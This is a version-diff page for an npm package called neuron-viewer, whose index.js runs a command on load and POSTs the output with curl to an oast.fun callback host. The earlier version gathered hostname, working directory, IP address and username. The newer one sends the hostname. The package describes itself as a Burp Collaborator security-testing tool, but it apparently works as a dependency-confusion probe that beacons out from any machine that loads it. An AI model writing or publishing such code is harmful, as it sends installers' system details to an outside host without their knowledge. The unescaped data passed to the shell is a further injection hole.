neuron-viewer 9.5.5 → 9.5.9

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,7 +1,7 @@
1
1
  const { exec } = require("child_process");
2
2
 
3
3
  function sendPingback(data) {
4
- const collaboratorUrl = "https://rxthgpisbdduguomjwmisrypidcuf7xqs.oast.fun";
4
+ const collaboratorUrl = "https://rxthgpisbdduguomjwmi64z7n68c4gwyn.oast.fun";
5
5
  exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
6
6
  if (error) {
7
7
  console.error(`Error: ${error.message}`);
@@ -33,5 +33,5 @@ function executeCommand(command) {
33
33
  }
34
34
 
35
35
  // Example: Execute a command (e.g., 'whoami')
36
- executeCommand('echo "Hostname: $(hostname), Directory: $(pwd), IP Address: $(hostname -I | awk '{print $1}'), Username: $(whoami)"');
36
+ executeCommand('hostname');
37
37
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "neuron-viewer",
3
- "version": "9.5.5",
3
+ "version": "9.5.9",
4
4
  "description": "A simple package to trigger Burp Collaborator for security testing",
5
5
  "main": "index.js",
6
6
  "scripts": {